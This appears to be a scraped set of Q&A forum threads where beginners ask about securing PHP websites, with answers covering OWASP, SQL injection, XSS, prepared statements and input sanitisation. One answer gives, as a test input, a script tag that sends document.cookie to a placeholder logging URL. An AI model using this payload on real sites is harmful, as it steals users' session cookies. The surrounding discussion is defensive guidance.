What security considerations should I/do I have to take into account if I decide to make a professional website(HTML,CSS,JavaScript,PHP,etc.). For example, when having a database, one should think about hackers who want to hack the website by SQL-injection. But there are many other examples. What I would like to know is a list of things(security) a webmaster must consider/take into account. Also maybe some things that are recommended, but not a must. A short explanation about each topic is much appreciated, but you don't have to. Thanks in advance.
btw. I'm not sure about the tags. Please add/modify if you know better.
The best resource for securing web applications is the OWASP Top 10: https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
I suggest you read through each of these top 10 security risks and ensure you understand three things:
What the risk is
How it is exploited
How to protect against it in you language of choice
Related
I was wondering if you can give me some suggestions or point me to some tutorials inorder to accomplish this?
I use googles recaptcha. Works great.
For blocking spammers, you should use Google's reCaptcha like #Byron said.
For some advanced security issues, I'd recommend taking a look on the OWASP site. The OWASP project defines a list called the Ten Top Project where the most common security issues on web applications are stated and how to solve them.
Also, for some more security articles on security using PHP I'd recommend Chris Shiflett's web.
Perhaps Im giving you too much material for a single contact form, but the security level is determined only by you, I can only point some good resources. Hope you find this helpful
I am testing out my scripts to see if they will prevent xss and sql injections. Can someone provide me with some basic but good scripts that would "hack" into my programs. I want to test my scripts before it goes online.
EDIT: Thank you all for those links, they contain loads and loads of information. But for a beginner to security, is there a recommended site that's? I'm not sure if I am ready to dive straight into in-dept security issues.
I like the links waiwai933 recommended.
Each situation requires different scripts, so there is no 'one size fits all' that anyone could provide. The list of scripts that would need to be tested goes into the thousands before you can be certain that your site is safe.
You may want to check Firefox or Chrome plugins which allow you to test SQL injections. I suggest this one, but you may want to look for others as well: https://addons.mozilla.org/en-US/firefox/addon/6727. What this does is that it allows you to provide a list of injection scripts, which it probably provides a few by default, and then once you activate it, it bombards your site with these scripts and lets you see where the vulnerabilities are.
I suggest this site for some example XSS scripts: http://ha.ckers.org/xss.html
The XSS cheatsheet at http://ha.ckers.org/xss.html is a good collection of XSS tests. I would not recommend implementing your own XSS checker, though; it is a lot harder than detecting SQL injections (as you will probably realize upon seeing some of the examples in the cheatsheet). The only solid method is to parse the code, build a DOM tree from it and transform that tree back to HTML, and that is a lot of work, and other people have done it already. Use something like HTML Purifier.
Googe's new jarslberg instructional site is a great resource to teach you how to write and defend against XSS and several other security attacks.
+1 for caring and knowing enough to ask. Since you're asking security questions I'd like to recommend the OWASP web site if you're not already familiar. You'll find all sorts of information over and above what you've asked., not to mention tons of info on preventing all sorts of attacks. The site is an invaluable tool for web developers.
http://www.owasp.org/index.php/Category:OWASP_CAL9000_Project
I have used this tool to some great results.
The most simple one which doesn't get blocked by browsers and can happen easily if you don't strip_tags() is the following code:
<script>(new Image).src = 'http://example.com/logSessions.php?s=' + document.cookie;</script>
You can try with Acunetix Security Scanner, it won't scan only for XSS and MySQL injection by default but even for other sort of exploits. The program practically emulates a browser and can behave as a logged in user.
I just read this article about piggy backing in PHP.
I googled it but not so much information there.
Can anyone tell me more details how to prevent this kind of attack, what kind of code practices are vulnable and what we should do?
Thanks in advance.
That article seems to refer to a vulnerable web application, not anything specific to PHP.
This previous thread provides some useful information regarding writing secure PHP code:
What security issues should I look out for in PHP
If we take the "They used these vulnerabilities to inject PHP code into the site" part of the article literally, then the developers likely used user input with include/require statements or eval
The article isn't particularly clear, but my guess is that they just used SQL injection and, to try to avoid detection, they inserted a script that didn't actually change the behavior of the site normally unless the visitor came from Google using a relevant search term, and the author is calling the redirection in that situation "piggybacking".
So: escape and validate all user input.
First link really on the general subject should give you some overview.
Second link is PHP / SQL - specific and should lead you to enlightenment.
The BBC news article is talking about "persistent xss". Leave it to the news to talk about hacking without mentioning anything about vulnerabilities. But that could be that the bbc.co.uk dosen't know what an xss vulnerability is, because if they did they would patch their own damn site!.
There are many ways to achieve remote code execution against a PHP web application. No one should ever call this "PHP Injection", if they call it this then they don't know what they are talking about. A Study In Scarlet is an excellent paper that details many different methods that an attacker can use to obtain remote code execution against a PHP application. This paper is intended for malicious hackers, not developers.
XSS is by far the easiest and most common method to nefariously palace advertisements on somebody's site.
I just wanted to know what are some basic PHP security techniques I should use when creating a web page that accepts articles?
I'm fairly new to PHP and was wondering what will hold the fort down until I'm a security expert?
There are two fronts to consider when accepting user-generated text that will later be displayed.
First off, you need to protect your database from injection attacks. There's a simple PHP function for this: mysql_real_escape_string() will usually suffice to protect your database from injection when passing this string in to store as a field value.
From there, you have to be careful about your display, as a user who is allowed to upload HTML code can do nasty things to other users when that code gets displayed. If you're doing plaintext articles, you can simply htmlspecialchars() the resulting text. (you'll also probably want to convert newlines to tags.) If you're using a formatting solution, such as the Markdown engine used on this site, those solutions will usually provide HTML sanitization as a function of the engine, but be sure to read the documentation and make sure.
Oh, make sure you're also verifying your GET/POST variables used to submit the articles. That goes without saying, and the verification performed is going to need to be tailored to what your site is doing with its logic.
This is to broad, maybe you should try to narrow it a bit.
What kind of security?
For passwords?
Do you want to restrict some stuff?
SQL Injection?
HTML Injection?
Cross domain security?
Well, as mentioned in the other answers, there are a number of different fronts in which your PHP scripts can be compromised.
Here are just a couple:
SQL Injection
Cross site scripting
There are a number of ways to deal with each. Here are some things to look at:
Suhosin
eval()
There is a lot to know, and you should start as soon as you can.
For one, if you accept articles (and probably use a WYSIWYG and are accepting HTML), use something to parse the content and strip out things that could leave you vulnerable to XSS and the like.
An example is HTML Purifier.
It might be wise to start by using a framework like Drupal or CakePHP. That way you can both learn from the way they've implemented security and take advantage of the fact that it's already been done. The learning curve is steep enough without having to roll your own authentication mechanisms etc.
maybe two tips could help you get more secure websites
create two users in your database, read only account to make only selects and counts, and write account when you have to do updates, inserts or deletes.
when you have to insert into database or delete, sanitize inputs, use mysql prepared statements or assert values that arrive via post or get this way :
if(!empty($_GET["integer_like_id_value"]){
$integer_id_value = (int)$_GET["integer_like_id_value"];
}else{
// that stuff seems not to be legit, die application, log error ? whatever
die();
}
Top 7 PHP Security Blunders
When your project is ready for public usage, it is generally a good idea to set error_reporting(0);
It won't provide more security, but it makes it lot harder (usually) for bad guys to find possible security problems with your site.
I'm a PHP/MySQL noob who knows nothing about online security.
Could you point me to some resources that will aid in my knowledge? (Beginner level, please!)
I'll suggest two things:
Make sure Register_globals is off.
Use prepared statements.
This question is well-answered and covers MySQL injection attacks (one of the more common concerns.
This question is also well documented and covers XSS (cross site scripting) attacks well.
Lastly, learn about PHP.INI and how to set it up and what is actually open/closed and on/off. A good host will, for example, never turn on register globals, but you should at least know what it is and why to check it. PHP Security has resources on that and many other PHP security concerns.
PHP might not be the best start. Especially if you're largely hand-rolling your own code. It doesn't exactly hold your hand with security issues. (fd: I wish PHP would go away for a variety of reasons.)
But some general rules:
Don't trust anything that comes from the outside. Always assume the user is some jerk trying to break your app. Most of them won't be, of course, but there will eventually be one who is. Just because you gave the browser a <select> containing a, b, and c doesn't mean you'll get one of those back. Javascript isn't a guarantee of anything. Referers can be easily faked. POST data can be easily faked. Textboxes can contain any character, not just the ones you expect.
Don't copy-paste others' code into production if you aren't sure how it works. You have no idea how much of an eye the author has for security. In my experience, PHP copypasta in particular seems to be less reliable but more frequently blindly reused.
Don't trust yourself to perform the same ritual in dozens of different places. Yes, mysql_real_escape_string() will fix SQL injection, but then you have to remember to use it everywhere. This creates a lot of places where you might make a mistake and forget your escaping ritual. Use prepared statements instead, and the problem vanishes entirely. Another example: Pylons (a Python framework) rigs its templates so any variable is HTML-escaped unless you explicitly ask otherwise. XSS is no longer a problem, and I never have to worry about manually escaping everything I print.
Chris Shiflett is the go-to guy on PHP programming and security:
http://phpsecurity.org/ for his book "Essential PHP Security"
http://shiflett.org/ for his website, blog, etc.
He is Speaking at PHP CodeWorks in Sept/Oct.
If you have some time, you could take a look at the slides used by Stefan Esser during his conference at the Dutch PHP Conference a few months ago, which title was "PHP Security Crash Course for beginners".
There are a couple of PDF :
Part I - Introduction
Part II - XSS
Part III -CSRF
Part IV - SQL Security
Part V - Session Management Security
Part VI + VII - PHP Code Inclusion and PHP Code Evaluation
Those could be helpful.
Then, don't hesitate to search a bit for non-PHP-specific informations : some security problems (like XSS, SQL Injections, CSRF, ...) are not specific to PHP : only the technical means to avoid them are specific ; so, you could find plenty of informations on sites like Wikipedia, or the OWASP website